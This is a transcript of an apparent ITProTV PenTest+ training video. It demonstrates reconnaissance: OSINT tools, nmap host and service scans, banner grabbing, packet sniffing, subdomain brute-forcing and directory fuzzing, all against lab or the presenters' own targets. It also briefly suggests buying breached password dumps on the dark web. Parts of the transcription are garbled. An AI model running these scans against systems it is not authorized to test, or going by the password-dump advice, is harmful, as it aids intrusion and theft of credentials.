Yeah, so this is the data that would be available from our organization that they might not realize is available, right? They're putting out in the public realm. Okay, so you go to a site like, oh, download this booklet, download this, download that. Well, who created that? Where did you get that? Does it have any known issues associated with the thing? Is it giving away sensitive information? Could be, who knows, right? So finding those things and looking for that data that's associated with your target can be very helpful because you never know what you'll find. Specifically, I'm starting to think of things like data dumps, passwords, right? So let's jump over here about this Have I Been Pwned website. If you've never heard of this website, it's great. You can check your passwords to see if they're a part of any known password dumps from data breaches, or your email address has been a part of any known data breaches, and so which ones. Return information. It's a great site just for standard OPSEC. So check that out. It also has a list of pwned websites, and you can just start looking through it. You can see the compromised data was email addresses, IP addresses, passwords, right? Passwords. Maybe I can go on the dark web then and look for, hey, does anybody got that 000 web host or AAA web host password dump? Cool, you do? You charge it for that? Not $5? Cool, there you go, $5 in Bitcoin. Everybody's happy. I now have a word list of passwords that goes against the target that I'm going after. So we see that a lot in the dark web. You can find those sources out there. I'm showing you the habit so you can see the myriad of websites. Well, there's a fun one. Adobe. They've done a couple of pieces, right? Apps. I guarantee you're going to run into a bunch of sites in here that you are familiar with, and might very well be your target. It is a very, so look at this. I don't think you see this slide, but it is a bit of a mess. Data research. Oh, look, there's your right? Kind of some information about it. So you go passwords or something you definitely go for. A file metadata. Actually ran a tool, a fun tool called MetaGoofil. You familiar with MetaGoofil? Never heard of it. It's a cookie name, those kids, those hackers out there. And it does take a minute to run, so I kind of pre-baked this turkey for us here. I've got all these files, so I was able to elicit from this. Now, one of them is MetaGoofil output. So just kind of save that so you can see it, because it takes a minute to run. I want to test it, I have to wait for it. So let's cat that file, MetaGoofil. And here's what it looked like as it ran. So here was the actual command that I threw it, right? MetaGoofil-d, which is the domain, which is ITProTV. A -t were types of files that I want you to look for. Look for PDF, TXTs, XMLs, .docx, and XLS, right? And just comma separated, etc., etc. Put on whatever you think would be interesting. -e is the time that it should wait before searching for the next thing, which is in, I believe, in milliseconds. You gotta find that sweet spot, because if you let this thing run by defaults, you'll probably get blocked by, WAFs and whatnot from it, specifically through Google, because I think it uses Google by default to search for these items. And Google go, what are you doing? You crazy nut, you stuck, right? And it wasn't an experimentation of those. And then you have to actually wait a certain period of time before you become off, you get the ban list, and I can run it again. So I found that 200 milliseconds seems to be a nice area where they don't complain, but it does take a little time for it to complete. And the dashboard on the end says, hey, any file you find, write it to the file system. I want you to basically download that file right here. And these are, you notice it was finding downloading file. It tells me this is the URL that it found for, and there's this installation manual for a thermal door device. Okay, we must be using some thermal door device somewhere around here, I don't know, but we have a manual for it found on our documents. So maybe that's an interesting fact we need to tell me about. Ultimately, at the end of the day, I found all these docs, and these are the docs that I found. I found this pop entry users registration guide, the installation manual for the thermal door device. I found a robot.txt file. If you guys don't know what that is, we're definitely getting into that when we get to the backing. Let me show you that. I will see here. That is in home /ITProTV /PenTest plus robots.txt. And there you go. This is the robots.txt file for our website that is meant to keep website crawlers from finding information. We don't want you crawling this part of our site, but there usually can be interesting information there, like web directories. What is this /grow? I don't know. What's this /? I don't know. Just a web app on the end of those, and something or sensitive information that I can learn more about my target from. That's a good question. I'm definitely want to check those out though, right? So we want to look for that. What else we have? Let me go back to this. Sitemap.xml. We got the Stranger Things. This is when we did the Stranger Things, right? I remember this. I was kind of funny. We Demogorgon out of paper. Put it on the wall. But this was the document that we have for how to set the Arduino board for making the link on our ABCD board. That was a lot of fun. And then so I got a couple XML files. Not only that, I started looking at the exif data on these files. Who created it? Maybe I learned about some new users and technologies that are being used. So let's take this. Let's take the Stranger Thing one, right? So if I do, I can use exif. There's an exif tool, and I'll throw Stranger Things. It's showing me screw up data. Sometimes that tool works, sometimes it doesn't. I like to make sure you're aware of it just in case you want to use it, because you always like to have options, and some tools might show more than others. But if I use exif tool, yes, and I do the same thing, it's usually a little more successful. Showing me that this was actually Microsoft Word documents built on Mac OS version 10.14. That's all good info for me as an attacker. Okay, we've got a lot of Mac operating systems maybe. If I start to see a lot of documents and they're created on Macs, that could be useful for me to start targeting those systems on the vulnerabilities. So you go, exif data. Don't forget strategic search engine searches, right? I've got this one over here, which is the Google hacking database. If you've never looked at Google Docs, they're a lot of fun. You can kind of figure out a lot of stuff about targeting your website, trying to find out if there's any kind of vulnerabilities or PDFs, anything you're looking for information. Look at the Google hacking database and kind of use some of their stuff. You can see some of the more recent Google Dorks, as they're called, added there, so you can look for forward, in title, OS, Zucon, SSL, all this interesting stuff in the category. Various online devices. Here's one called Pages and Login Portals. I can use that and target my site with it and see if I can find login portals that use this open game panel 1.1. Could be interesting stuff for us. What else do I have for us here? We use the Harvester, which is another automation tool to start going after stuff. So I'll do the Harvester, and I'll just let that give me a help file there. It does give us, I used to, the automation at the top. It used to give us some really nice, here's how you do this kind of thing, but it's pretty straightforward, right? You tell it the host you want to go for, and you have D for domain. So this is the company name you search. You can do some limitations on this. Ultimately, a lot of times what you're going to do is tell it what sources you want to use, and here are the list of sources that you can use, right there. Click on Google, Yahoo, so on and so forth, and then start going to town. It's really good about finding things like email addresses, contact information, and it does it automatically. Right? You just fire the tool off and look at the results and go, oh, look at these lovely email addresses that we just found. And I'll add that to them because those can typically be possible usernames, right? Looking for usernames. Another great way is email addresses. Find email addresses and username stuff there. Other things. Oh yeah, man, we got a ton of stuff here. Let's go back over to our website here. The Wayback Machine. Sometimes sensitive information is contained in previous versions of target websites, right? So look for your target ITPro. Hello. Can you hear me? I don't think you can. It's like I'm typing with this here. Anyway, I'll refresh the page. Sometimes that works. Hi, welcome to the show. It is not taking anything from me. Anyway, you can look at those previous versions. I'll show you a map with like screenshots. Just click on it and take it there. Showdown's another great one where you can throw in some IP address, and maybe that's a part of my target scope. And I can see there's ports 80 and 443 open, scrolling through Amazon, starting again to learn more information about my target systems. Cool, we are running GitHub. Don't forget that. They can have some great information in their GitHub repositories. So look for company-run GitHub pages. You never know what you'll find in there. My name is Holiday on that stuff again. So yeah, good stuff. There's lots of public resources out there that have data in them.
All right, so Daniel, now that we're kind of done, what are the other tools that we have to take a look at?
Yeah, one I like to always bring up is Recon-NG. It's a great tool for doing when you're doing Recon, you're gathering all this lovely information. It can help you keep it all organized. Actually, can run some automated scans for you as well. So Recon-NG, you fire that up. If you're not installed, obviously it's an app get installed away. But ultimately, it kind of looks like Metasploit. If you've never worked with that, we'll probably play around with that a little bit. It's very Metasploit looking. But here you go. You can do help is always your help. Is always good help for you, and give you the things you can look for. Like I want to create a workspace specific to my target. I could say, help workspace. I guess it's plural. It gives you the list of things you can do: create, list, load, remove. So if I want to do workspaces, create, we'll call ITProTV. And now I can do workspaces list. You can see I now have that. I'm actually already in that, and I can start gathering data. There's also some modules. If I do help again, and this marketplace where you get a lot of great stuff. So I can do marketplace info all. It'll show me all the modules I can get from the marketplace and what they do. If you want to, you can install all of them by just doing install all, and then you'll be able to look through those modules and find the ones that you need. Really cool stuff. So like Recon-NG, I was going to call it out. That's what things I want to call out as some resources from MITRE, like the common weakness enumerations, right? Is a community developed list of software and hardware weakness types. So if you find hardware and software from your target, you can come here and check to see does it have any common weaknesses that are known about that. Also, again, CVEs, which are common vulnerabilities and exposures from the same organization, and you can look for very specific types of attacks and the details that are in those. So I've got both of those websites available for you in the learner resources. Actually, all the websites we looked at today will also be learner resources. But there you go. Recon, it's a lot of work. It does get a little mundane and monotonous, but it is a very important step that we need to indulge in when it comes to starting to figure out our target a little bit.
All right, Daniel, that was quite a list of different things that we actually did review here, but just make sure that everybody got in what they did. Let's go ahead and review those top key points here. So we did take a look, of course, at passive recon and social media, which really does show us a lot of information that the company may already be giving out just for free, as well as other cryptographic flaws that may be used even though they shouldn't be used, but we may actually want to, of course, explore those and see that matches up with things we have. Public data that may exist even though we don't want them to exist. We can, of course, find additional information. And, of course, the tools that Daniel did show us that can help us to reveal some more information that actually goes for reconnaissance. Well, that does it for this episode, but that doesn't mean that that's all that there is for PenTest Plus. Make sure you stay tuned for the very next episode. Many times in penetration, find out more next.
You're watching ITProTV.
All right, you are joining us right here, and I'm with Mr. Daniel Lowry as we get started here, taking up beyond the measures of passive recon that we can do. We're now taking a look at active reconnaissance that we can do as well. Now, Daniel, this is probably where most pen testers, at least people that want to get into testing, they say, this is what I was really after. Not yet. I don't want to go to Facebook and search for stuff. I want to actually do the thing that it says I'm supposed to do.
I hear you.
So where would we actually get started as we're kind of beginning to learn about this?
All right, so I like that you set this up to the idea that we were moving into more active types of reconnaissance, and specifically here today we're going to be discussing host discovery and enumeration. So I want to know what actually, because right, that's the running point. It's great to have like some details that I found from an online forum and different technologies that they're using, and contact information, possible usernames, through email addresses, all great stuff. But at the end of the day, you have to connect. I'm trying to get into a system. Therefore, there must be a system, also known as a host, right? So okay, if that is the case, what hosts are available to me, and what can I learn about those hosts? Because at the end of the day, again, I want to try to find some vulnerability that will allow me to make my way into those sensitive areas, or maybe even have full control of that device from a remote location. I think that's what Ronnie is trying to get at with his statements, which I think is absolutely true. This is kind of more the fun bits that, like, oh, I want to do something, right? Today we're going to do a little something.
All right, sounds cool. So where do we begin?
Where do we begin? Let's start off with hosts and services, right? So we got hosts and services. Think of ping sweeps. Okay. So if you're doing especially internal audits, then I have access to the network at large, which is a very common thing to do. A lot of times you do both an internal and external penetration test. So if I'm on an internal penetration test, I can do a ping sweep of the entire network to start looking for good end nodes or hosts that might give me some great information, right? Because at the end of the day, I'm trying to gain complete access and control over their network so that I can move about the cabin as I see fit. But if I don't know what's out there, I have a hard time doing that. So I need to discover those possible weak and vulnerable hosts. So how do we do that? Well, a couple ways of doing this. Again, I can just run a ping sweep. Hey, ping, ping, ping. Remember the ping utility? Ronnie, you've used ping before.
Yeah,
what's its intention?
Yeah, its intention, of course, is to send information out and to have the other one to respond back. So if it can respond back, you know it's there.
You know it's there, right? Now some systems are set up like Windows. I'm looking at you, right? To not respond to ping, but if I get a firewall off, you have to open that. But you never know, someone might have opened that hole in that firewall. Let me know some of the systems do exist. So just be aware your mileage may vary when it comes to ping sweeps. But one way we can do it is through, well, we haven't actually mentioned yet, nmap, right? The network mapper. It is great. Learn it, use it, love it, know it. Get a tattoo of the flags on your arm. Don't do that. Just memorize them. The good news is when I'll show you, you go to your computer and you type the word nmap. It gives you all those flags with some really great detail. So no need for the inkage unless you're just that much of a hardcore mark for nmap. Then hey, that might be some cool geek thing to do. Other than that though, we do want to learn how can we use nmap to perform host discovery. Guess what? There's a whole section of it right there at the top of this little screen about what's that called? Host discovery. That's right. A couple of ways you can do it. You got list scan, so you can simply list the targets that you wish to scan. Maybe you kind of pregame this. You have some known targets that you want to go after. When I say scan, that means it's going to check and see is that target actually alive? Does it have any interesting reports that it needs to look for? Then we have ping scan. This is more along the lines of what we were talking about, right? Just look for hosts and let me know if anything is out there. If so, what is it? And make a list of it for me, right? You'll notice that it does disable the port scan when it does that. Weirdly enough, you can actually do this PM thing, treat all hosts as they were online, skipping host discovery. And that does come into play. It does make things a little helpful for us as we use nmap in other ways. But right now, I think what we want to know is, hey, ping scan. Tell me what machines that you can find just cursorily. And one of the options I do like to use is -n, which never do DNS resolution, or you can do -r, which is always resolve. But I like to never do DNS resolution. A lot of times use it up. Right. Makes it run a little bit faster. So that said, shall we? Let's see what we do. Let's do here nmap, right? Pretty straightforward. -sn. I will do -n. I wonder if that will get crazy. We'll see what happens here. And then I give it the network range of which I wish to scan. 192.168. I think I'm on 241. Oh, network is /24. Fire off, and it is going. Now, how long this will take can vary. Obviously, this was pretty quick. It did do a name resolution, so therefore I probably sped that process up just a little bit. But it did return a few results. So we got 241.1, 241.131, 241.141. And so I got, this is a very small network, obviously. If I were to scan the right network, I would have hundreds of devices that came back with a little too much power for us. So I've just got a controlled network, a virtual network. And I do have a couple of machines that I know now would be a good target for me. Now, obviously, and that's a great way of going about this. It's usually installed. You have Poly, whatever you're using as your penetration testing platform. It's probably got that pre-gamed up in it, so you don't even have to install it. If you're like kind of rolling your own idea, you're baking your own kind of system, you might need to install it. It's a pretty common tool though. So it is most likely in the repositories for whatever version you're using. If you're using Windows, you're going to need to go to insecure.org, grab a copy of that, and check down there. You got a graphical front end for it called ZenMap. So if you prefer that, by all means check that out. So a really cool GUI for doing nmap searches. I'm so used to working on terminal, that's where I live. Now, it's not the only way to go. You use other third parties. They're not the only thing that does ping sweeps. I think of things like SolarWinds. They have stuff like Angry IP Scanner, a really good, fast, quick, and dirty graphical tool for Windows machines for doing ping enumeration of different targets, of finding those machines. Or you can make your own scanner, which I have done. I'll actually show it to you here, Cat, one of my /tools, and it's called Sweeper. So I just wrote my own little bash script here to run through an IP subnets. It's just doing a ping and grepping out only the IP address. I'm basically just doing some bash magic to just show me the IPs that actually responded. Everything else, ignore that because it didn't respond. So if I run this, if I do, what is it, no, I do tools? No, yes, no. I'm wondering, what directory am I in? I'm in my home directory tools, and it's Sweeper. Gotta say, so fire that off, enter subnet, 192.168.241, hit enter, and you can see it just returns the IPs that responded. So that's my own tool. I created it. You can do a PowerShell, you do a Bash, do a Python, do whatever you like. Go crazy, make your own tool, automate stuff. We're gonna talk a bit more about that in this series. Not right now, but down the road, it's coming. Don't worry, it'll be there, where you can learn to do things like this through automation. So a lot of fun.
So now that we've figured out like possibly how we could find a target, you also mentioned the idea of services. Why are services going to be important for us to find?
Yeah, because that's going to be those inroads into those targets themselves. Now that I have good targets, I've got a whole list of them here, I can now start to learn or enumerate further on what openings they might have that I might find my way into the system. So again, we probably run nmap for that. Again, not the only way to do it, but is the one of the more common ways and useful ways to do it. So let's clear it out here. 131.141. Actually, I'm going to take my own IP. What IP am I running? I am that 131. So I can basically ignore myself. So it looks like 141 is going to be our target. So clear. If I do an nmap and I just want to get those services, I can do, and also versioning information is usually really helpful because maybe it's running an older version that has a weakness. Like I know what version it is, so I can start looking for weaknesses. So I like to do a -SV for versions, right? And then I tell it, I'm going to speed things up. We'll talk a little more about speeds later, but I'm going to speed things up just to make it fast. And I'm going to do a -n, right? There's no name generation. And I'm going to assume that the device is up because we've already done the ping scan. I don't need to ping it again. I know it works, so the -pn gets involved. And I tell it 192.168.241.141, I believe, was the device. Fire that off. And it says, oh, host discovery is disabled. That's okay. But it is running that version scan with the SV, so it's going to take a little bit longer because it does have to enumerate what is the version, if at all possible, of those ports. And we start to see it. We do have some ports open underneath the port column. The state, right, showing that it's open. We also see the service that's running, and then that lovely versioning information. Oh, so good for us right there. That I can start to learn and see, do any of these things have a weakness that I can exploit? I want to save this information because this is really good stuff right here. And we see we have quite a few ports open that we can go after. 21, 22, 53, 80 to learn this information. Now, nmap does this very well, and it's going to be one of the ways you can do this. Another way you can do this through what's called banner grabbing. I can use tools like Telnet or NetCat to try to grab banners. So let's see here. Maybe, let's take 22, right? I can try port 22, maybe just SSH into it. So SSH into port 12 screen, so it's a little nicer. So SSH into, what was it, 192.168.241.141. Let's see if I get any information about that. So it's telling me yes, I was to continue, firmly added. It's asking for password. They need good info, no good banners there. Sometimes if you telnet, you might get some information on that, so we'll see this. Let me try telnets into 192.168.241. Oop, that's 167.8.241 on port 22. And see, oh, look at that. I'm running SSH 2.0 Open SSH 7.2 P1 on Ubuntu for 2.4. Right? So I've grabbed that banner. I now am enumerating out the actual version and what type of service is actually running. So when telnet can do this, I think that will probably give you the same kind of thing. This is the information we want. Right? This is what enumeration is all about. So listing those details that we can figure out so we can work our way a little bit further down the road toward eventual, right? Complex. That's what we want to do. So banner grabbing, we got versioning, doing nmap, really good stuff.
Can you tell us a little bit more about the idea of packet crafting and how this fits into what we're talking about?
Yeah, so packet crafting is the idea that instead of going with something off the shelf, nmap, even telnet or netcat or whatever, that I want to make a specific packet to try to do a specific thing. And this is a bit of a more intense type of skill set. And usually what you like to use, now you can do some of that stuff with some of these other tools, but if you really want good control with a system that's built to give you that level of control, is you can probably run to what's called Scapy. It's a library that you can use for Python. So if you want to use that, you can. I'll show you what that looks like. I'm just going to type in Scapy because I have it installed. And when I do, it gives me the Python interpreter, right? But Scapy is already ready to go. And if you do, it's not very helpful at this point in time, kind of assumes you know what you're doing here. So I'm going to exit out. And I'm just going to do man Scapy. And it's going to give you a lot more good information here. Right? Interactive packet manipulation tool. It even gives you a really good description of what that is and what it's for, as well as some actual usage, like some commands. Only the vital commands to begin are listed here for the moment, but you do have some good stuff. I believe it also tells you where the documents are. Gives you the website. So let's go to docs. Is that down here? It's in here somewhere. I know it is. So, oh, there it is. No, sorry, that's files. I know it's in here. But there's Scapy documents. Did you go in the
IO?
Yeah, was it
IO? Yeah, there's the IO.
That sounds right.
Under examples?
Oh, there we go. The examples. Yes, excellent. Aha. GitHub repository, official website, all and official documentation. Scapy.readthedocs.io. Yeah. That's a great place to go to get all the information you need. But we do have some really nice examples already right here. Active OS fingerprinting, anybody? Right? You notice we got some weird nmap modules you'll have to learn how to work with. Again, we're not going to get into the details on how to use Scapy and become Scapy experts, but packet craft. Let me put it this way. You're sitting in, I don't know, a booth somewhere. You're answering questions about cybersecurity and penetration testing in some capacity. And they say something to the effect about packet crafting. And on some possible answers, one of them says Scapy. That might be where you want to run if you get my drift. Yeah. You pick up and put down, hopefully you'll got it. Right? But if you do want to learn more about Scapy, it is a really cool tool and it's super powerful. It is just a bit of like you have to learn how to use it. It's not intuitive. You have to go through the documentation, do some practice tutorials, which will help you learn more about that system. If you do, you'll have a really good skill set in your toolkit. So I would recommend doing that after you pass your exam.
So along with what we actually just did here, some of them can actually be like physical types of active recon that we do. So let's talk about wireless a little bit and something called word driving.
Yeah, word driving is an interesting topic because, right, Ronnie's very true to form too. Well, some network hosts you can discover the physical thing itself from doing things like word driving. Word driving is basically the idea of, originally was you were actually driving around in your car looking for wireless access points and wireless devices that showed up on a scanner. Now anybody has a laptop or computer right now with a wireless device in it, or even your phone, you can look for Wi-Fi signals. And that's basically what we're doing. You're just walking around the organization and looking for wireless endpoints. Because a lot of times, guess what? Those lovely employees, man, especially that Billy, right? Call Billy in here. What's Billy doing? Billy set up a wireless access point in his desk to bypass our security. Well, that might be useful for me as an attacker. So I'm walking around with a Wi-Fi scanner and I see Billy's wireless AP pop up. I'm like, I wonder if that's authorized or not. Probably not, though. And since it's going right into their network without anybody knowing, that's typically referred to as shadow IT. Well, now Billy has given us a lovely little inroad into our target organization, right? So I want to look for those devices, swap around with your scanner, and look to see what access points you see. Check and see if there's open access points as well. It could be a great way to find yourself into your target's network.
All right, so there's another particular topic that this is probably where most people start getting interested. You hear about the idea of packet sniffing. Can you tell us a little more about
Sure.
that?
So this is the ability to actually look at the packet information that is crossing your computer, right? So the thing you need to do is be able to put your network interface card into wireless mode, your adapter, or into wireless mode, I'm sorry, but monitoring promiscuous mode. Thank you so much. Into promiscuous mode, which will allow you to, instead of rejecting any packets that aren't destined for you, it will now start going, yes, let me see what that is. And typically we're going to use Wireshark to look at these things. Other things are available like TCP dump. There's another called T-Shark, which is the terminal version of Wireshark. Very helpful there. But Wireshark is usually where we're going to go to do this. It is the gold standard. Where let's fire up a Wireshark and see what happens. Wireshark. You'll notice I'm sudoing Wireshark. That's because if you want to use something like Wireshark, you'll need administrative access because it is reaching out to the lowest levels of system control at the packet level, right? So you need to be able to control those packets and that card, that specific card, and you need to have that level of control over it. Then you're going to have to actually put in your OS. Now you notice no traffic actually popping on here. But if I start doing something like, I don't know, we split this here, and I'll ping that device 192.168.241.141. There we go, we'll fire that off. And then we go back, you start to see those ICMP protocols. I know it's a little small, don't worry, I'll just zoom in a little bit here so you can see that. And you'll see things like source, destination, what protocols being used. Oh, you'll notice that ARP just kind of flew by us right there, right? The length of the packet, the info that was in the packet, and some very interesting stuff. Now again, let's go and stop this capture. And if we kind of get back down into, I'm gonna find one of those ARP packets. We'll take a look at that. And you'll see it's doing something like, who has this device? We'll tell this device. Well, if I'm in promiscuous mode and other devices are throwing ARPs typically on a broadcast, I'm picking up ARPs for all sorts of stuff because it's asking me, do I know where that is? Well, I might learn about more systems that way because, right? Oh, is 192.168.241.131 a known IP in my target list? If not, it is now. Right? So things like ARP traffic, DHCP traffic, and you might pick up other different types of protocols that fly across your machine. You might even start picking up things like usernames and passwords that got thrown in clear text because I'm gathering that information and now I'm able to view it using something like Wireshark to see inside those packets at the packet level. So very interesting stuff. Can be very helpful for us. We need to get good at using Wireshark because we can now enumerate different targets, new hosts that we didn't know existed through the various and sundry different traffic that might cross it. So get good with Wireshark. It's definitely your friend. You want to get familiar with it.
All right, well, that's plenty of great information for those of us that are beginning to understand a little bit more about becoming a pen tester. These are some of the different active recon techniques that we went over in this episode. So make sure you pay attention to that as well as more episodes as they come up. But that will do it for us, and that means you are ready for the next episode of CompTIA's PenTest Plus, and we'll see you there next. Brute force attack. That's right, we are heading into the realm of taking a look at web and cloud, and of course we have Mr. Pentester himself, Daniel Larry. As we get started, actually mentioned in our teaser some of these terms, and even though I think I know what they mean, I'm pretty sure that I might actually be confusing a few things here. So when we get started and we start talking about this idea, you're gonna help us out with some of this terminology. Some of it sounds almost familiar, but some of it sounds like it's terminology and that just might fly by our heads here.
Well, yeah, definitely we will make sure that the good folks out there watching you as well, right? We get you schooled up. That's I'm probably sure you're pretty right. Like as far as, well, you know, so you say you might be familiar with some of these terminologies, you think you are. It's all about context, right? Within what context that might change the idea behind what it is you're doing, maybe at a specific way in which it should be done or something like that, right? So we'll definitely make sure we give you that context because that's gonna be helpful. We don't want you to make any mistakes when terminology kind of cross-pollinates across different areas.
So speaking of context, we're not focusing in on really like one machine in that sense. Now we've actually switched subjects a little bit more towards the web and towards the cloud, and a lot of times these things are not going to be somewhere we're going to directly target in terms of a system inside of our own networks or anything like that. It's actually going to be somewhere out there, and cloud seems to be more ethereal in that sense. So when we begin, you want us to begin talking about the idea of brute force attacks here, domain brute force.
Well, yeah. So when it comes to your pen testing soirees, as it were, right? As Ronnie alluded to, you're probably going after a target that you do not own, and depending on what type of test or engagement you're doing, it could be a black box, it could be a white box, maybe some form of gray box testing. Especially when it comes to web, though, we're typically looking at some form of black box test from the outside in an external test as another way you might see it, and probably together with both black and external, right? So a lot of veiled secrecy going on because we're trying to look at this as if we were a true attacker. What is the attack surface looking like? And remember, we're in that information gathering phase of our attacks. So what are we trying to do? We're trying to gather information on our target. This is where the domain brute forcing comes in. Because you remember, when you go to your scope, it might just say star.ourcompany.com as far as web assets or domains that are within scope. We see that kind of catch-all, that anything that ends in our company or this is the IP and anything that falls under that IP. Well, great. Now, what are those assets? How do we find them? That's where domain and subdomain brute forcing kind of comes into play. That's what we want to do. Look at a couple of tools that can help us out with that. First one's going to be Nmap, right? Nmap, we're going to see Nmap used quite a bit. It's a very handy-dandy tool. It does a lot of good stuff for it. That doesn't mean it's the best tool for doing a lot of these things, but it is a tool that you could use. And if you are limited in your scope on what tools you can use, maybe Nmap is approved. Therefore, you get a lot of mileage out of it. So, shall we take a look at it?
Let's definitely take a look, because this is where I start getting really fuzzy. All of a sudden we start talking about, all right, how do we implement it? So the first step of trying to gather it, if we actually at least know the domain name, right? It is kind of the first step. But then how do we actually take Nmap and use that to
all right, so let's do it. Let's jump in the open computer here. Let's make Nmap work for us, shall we? I like to, when I'm logged in, not as root, I tend to sudo every Nmap command, so it's just a good practice. Sudo Nmap. And then what we're going to do is we're going to do a dash script. We'll get into more about the different common types of Nmap switches and arguments that you have available, the options. But right now I'm just running a script again because I want a specific script, which is dns-brute.nsc, right? And I'll do my target, which is 192. No, I'm sorry. This is ITProTV. I'm pro.tv. Yeah, go right after the real deal. Do my password. All right, and we're gonna let that fire up. Now, again, as these things do, this might take a hot second, so we'll let that crank out. We'll talk about a couple other tools while that's happening. Some of the things that kind of do the same thing, but maybe give you more information, less information, so on and so forth. And actually, it's funny, it's already done. Nice. Yeah, look at that. I love when things go fast like that. But there you go. I'm finding different subdomains. You'll notice DNS brute force of hostnames. So we got http.itpro.tv, and then the IPs that are associated with that. We got MySQL, we got an app, and some of these look to be no, they have different IPs on them. So you might be running on more than one machine, kind of load balancing going on there. What else we got? App.itpro.tv, web.itpro.tv, and so on and so forth. Wiki, www, www2, right? So on and so forth. If we have that star.itpro.tv as our scope, well, then all of these subdomains are now in scope. You never know what might be lying on this. As you can see, they do take you to different IP addresses. So these might be different web applications. They might have different vulnerabilities, and that's what it's all about. Remember, we're doing that discovery phase, that enumeration, a list of good hosts, and this is obviously a really good way of doing it. And there are subdomains that probably have web applications on there. What web app is on is at those sites. Are there any vulnerabilities? You start to see where the ball is rolling. We're trying to push it, go toward there. So Nmap actually did a really good job coming back with some stuff. Another tool, Fierce will do this. We have DNS Map will do this as well. Sublister, the Harvester. And we can just run some of these tools if you like. Let's try the Harvester. Let's see what the Harvester does here. So we'll do, let me clear the screen. The Harvester, like so, and we just do -DNS-root and then ITPro.tv. There we go. Let it fire off. Oh, looks like I did a little something. Oh, I gotta get the -D for the domain. That usually helps Daniel. That might help. There you go. Starting DNS root, and it's definitely probably gonna take a little longer because it's most likely got a larger word. What's happening is it's looking for commonly used subdomain names, and it's looking through that. So this brute force will probably take a little bit longer. Then, man, I love being wrong. I love when I'm wrong like that. I think I just have to mention the fact that I think it's gonna take a long time to pop right up.
So the idea, though, of actually learning about both tools, right? You may get a different result with one versus the other.
Correct. That's the idea. So the more tools you become familiar with, that you engage in this, you might find some subdomains or domains in one tool that you don't find in the other, and vice versa, right? So using a multitude of tools is going to be a better strategy for finding all the domains, because you never know when that one subdomain that you find is the key to finding your way actually into the system, finding that right vulnerability that you know how to work with or is just horribly exploitable, and you can find your way. So there you go. That is domain names. Last thing you can do is kind of like also look for URLs. So URLs are something you should definitely be scraping around for inside the websites. You go to these things, look in the source code, and see, oh, what are the URLs I'm seeing? Because those could be good hooks. You never know what they're calling, what they're going for. So I might enumerate out some hooks that you might have before.
All right, so here's a term that I find a little bit confusing that you have here: crawling sites, and I know we're going to talk about one a little bit later. Scraping sites. To me, that sounds almost the same thing.
Very similar. So crawling sites is typically the idea of I kind of want to map out how the site looks. Right? So I want to find every nook and cranny. Where's it go? Are there directories? If so, you find them. What's in those directories? And a lot of times you do this through automation. You can do it manually, but man, with today's applications, like I don't not recommend doing that, but I also recommend you make sure you do this through some sort of automation, because then kind of going through things manually. Let the automation tool do its job first, and then kind of go through that and see what you can see. I do have OWASP Zap here, and if we start looking at tools, let's see here. Let's go to I went to CompTIA.org. Let's kind of refresh that page, and now you can see. Oh, you can kind of see where's the grabber? There it is. Down at the bottom here, it's capturing all the requests and things that are going on. But over here, I want to see. Let's see if I can find the actual. This is all other stuff. Where are you? I know you're in here. Well, let's go here. This is really what we want, the sites. I was kind of looking for it, but it's lost in the milieu, right? Man, that's a hard grabber. There we go. So down over here, you'll notice I've got all these different sites available. Pull it in so you can see. These are sites that have been contacted by my web browser, right? And have been captured through this proxy, which is OWASP Zap, the Z attack proxy. So it kind of just keeps running tally of anything that is surfed or contacted. And it lists them over here. And eventually I should be able to see things like CompTIA.org right there. So there is my site that I went to. I can see how to get requests in there. We also have some client scripts, some resource packages. So this is the crawler that is built into OWASP Zap. Burp Suite also has one as well. It's not as, it does a really good job, but if you want full functionality, active scanning capabilities and everything, you'll need the pro version. The community version does a great job. It works kind of similar to what we see here, where we see just all those different sites. Now I can manually kind of go through these things. What am I looking at? What's this assets folder? What's this disk folder? We got CSS and JavaScript. What's in the JavaScript? Oh, I can look at these pages and see what they are. I can actually browse to that. Can I look at that information? Is there anything good in there? Maybe I find some good information about versioning of software that they're using in their web application, what technologies are being used. You start to get a good picture and idea of what that application looks like from crawling sites. What crawling is all about. Now scraping, bit different, like I said, kind of similar, but a little bit different. Scraping is I'm looking for something specific, right? And I'm going to use a tool to scrape the site for. I want you to look at I'll tell the automation tool, hey, go forth and find me these things. And then it makes the appropriate web requests and says, oh, and then it looks through that information that gets returned and sees, does it find that information that the user requested? If it does, returns it back to them. Now, a lot of times, again, these automation tools you go find GitHub or build your own if you like. It's not too difficult to build a web scraper. Oh, I'm going to give you some hints here. Beautiful Soup is going to be an interesting thing to learn about to build a scraper, but most of us are probably going to run some third-party tool. Let's see any that were specifically called out for the exam. So this is probably a pick poison kind of idea for doing this stuff. So there you go. That is scraping sites.
All right, now the other one that I think is actually kind of a funny name here is going to be directory fuzzing. So help us out here, Daniel.
So directory fuzzing is when we're looking here in OWASP Zap, we saw that we saw a few directories, right? So we had this one here that had these assets and off the main site and so on and so forth. Dist, CSS. Those are directories in the site. Okay. What are the directories that they're not telling me about? Maybe there are some directories that are kind of being used by the development team, or they're kind of more obscure and hidden, but might have really good information in it. So I need to be able to fuzz those out, which is basically the idea of guessing for that through automation, right? Working my way through maybe this exists and check and see if not, then move on to the next one. And guess what? The lovely tool we're looking at now has a tool that can help you with that called Dirtbuster. I think if you just right click on the site that you want, there is going to be under attack. Then you have force the directory browse, right? So that's what you want to look for right there. So that's going to be your Dirtbuster. I think that's exactly what it is. I'm not as familiar with the Zap as I am with other tools, but it does have in there Dirtbuster's hidden in there, so I'm pretty sure that that's where it is. Well, let's just hit that. Oh, it's doing it. Right? Is it doing it? It looks like it's trying to do that. Okay, we'll leave it alone. There used to be if you right click just hit Dirtbuster and you went to that. I don't want to tell you that from now. I think these things change. This is the latest version of the but I do believe. Oh, it's Zap. But normally what I do is this. I'm just going to close. I'll just pop this down here. Normally what I do is this. I have to change it to my virtual network here. You just pop that over real quick. Get into my private network and save that. Let's just switch this over. We'll use a couple other tools that I actually normally use, and two of those being GoBuster and Derb. And I like having the 1-2 punch because, again, those options will make this whole lot more thorough for when we're trying to get these things. So now we have that. They're both command line tools. clear screen. So to use GoBuster, I have a target up and running. So let me just verify my IP address has changed. It is. I'm in this 241.192 area here. So clear that out, and I'll use GoBuster. I'm gonna tell them I want to do the directory fuzzing. So I'm gonna tell dir, and then I'm gonna give it the URL. So dash u http bam 192.168.241.143 is my target. So I want it to find all the directories that are available that it can find. And I say they're available that it can find. We're gonna use a word list to do that. So I'm gonna tell dash w for the word list, and the word list for me, I'll take the user share word list, and I'll actually grab one from dir. But if you want 